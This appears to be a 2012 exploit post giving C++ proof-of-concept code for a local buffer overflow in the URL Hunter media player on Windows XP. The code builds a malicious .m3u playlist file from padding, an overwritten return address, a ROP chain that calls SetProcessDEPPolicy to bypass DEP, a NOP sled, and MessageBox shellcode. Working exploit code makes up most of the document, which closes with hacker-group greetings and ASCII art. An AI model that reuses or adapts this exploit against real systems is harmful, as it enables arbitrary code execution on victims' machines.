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URL Hunter buffer overflow DEP Bypass
来源:fb.me/Ayrbyte 作者:Ayrbyte 发布时间:2012-06-25  
 Exploit Title: URL Hunter buffer overflow DEP Bypass
 Author: Ayrbyte
 Vendor or Software Link: Mini-stream Software
 Link : http://mini-stream.net/url-hunter/
 Category: local
 Tested on: Windows XP sp 2
 Code : c++
 Fb : /Ayrbyte
Greetz To :
    XerkusR, Kira, 3|_^^1x, WPFr, C-byte, H4mz_JR, Ch0lise7en, R31tuz
    Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
    Zet Dot Exe, Gabby X-Friends, Valcon Trignome
    and all CREMY & b-compi family
//NOTE: Path Ayrbyte.m3u must be on the c://Ayrbyte.m3u
#include <cstdio>
#include <iostream>
using namespace std;
int main(){
char header[] = "http://";
char buff[] = "\x41";
char eip[] = "\x16\x10\x9c\x7c";//#retn |SHELL32.dll
char nop[] = "\x90";
//call MessageBoxA "PWNED by Ayrbyte...! ^_^"
char code[] =
"\xB8\x36\xC6\x0D\x10" //#MOV EAX,100DC636
"\xB9\xFF\xFF\xFF\x0F" //#MOV ECX,0FFFFFFF
"\x2B\xC1\x2B\xD1\x52" //#SUB EAX,ECX #SUB EDX,ECX #PUSH EDX
"\x50\x90\x90\x90\x90" //#PUSH EAX #NOP #NOP #NOP #NOP
"\x90\x50\x90\x90\x90" //#NOP #PUSH EAX #NOP #NOP #NOP
"\x90\x52\x90"         //#NOP #PUSH EDX #NOP
"\xE8\xD5\x3E\xCA\x77" //<---CALL USER32.MessageBoxA
//string "PWNED By Ayrbyte...! ^_^"
char rop[] =
"\x41\x41\x41\x41" //agar mengarah ke esp
"\x42\x02\x9F\x7C" //#pop ebx #retn |shell32.dll
"\xFF\xFF\xFF\xFF" //<--akan di taruh di ebx
"\xD8\x85\xA4\x7C" //#inc ebx #retn |shell32.dll
"\xAF\xCF\xA4\x7C" //#pop ebp #retn |shell32.dll
"\xA4\x22\x86\x7C" //#<- SetProcessDEPPolicy, ke EBP
"\xCA\x2E\xAE\x7c" //#pop edi #retn |shell32.dll
"\xCB\x2E\xAE\x7C" //#retn |shell32.dll
"\xFE\x2E\xAE\x7C" //#pop esi #retn |shell32.dll
"\xCB\x2E\xAE\x7C" //#retn |shell32.dll
"\x01\x4E\x9E\x7C" //#xor eax,eax #retn |shell32.dll
"\x1D\xC9\x91\x7C" //#xor ecx,ecx #retn |ntdll.dll
"\x8E\x09\xF3\x77" //#xor edx,edx #retn |gdi32.dll
"\x65\x82\xA5\x7C";//#jmp esp |shell32.dll
//Make Exploit File
FILE *teksfile;
teksfile = fopen("c:\\Ayrbyte.m3u", "w");
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);}
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);}
fputs(code, teksfile);
return 0;}
#we are CREMY          ##########       ###### ###### ##   ##
#we are unity          ##        ###### ##  ## ##  ##  ##  ##
#we love peace         ## ###### ##     ##  ## ##  ##   ## ##
#we crazy but not lazy ## ##  ## ########### ####  ##    ####
#what about you...?    ## ###### ##     ##         ##     ###
#be crazy now...!      ## ## ##  ###### ##         ##      ##
##################################     ##         ##      ##
                          ##  ##    #######################   */

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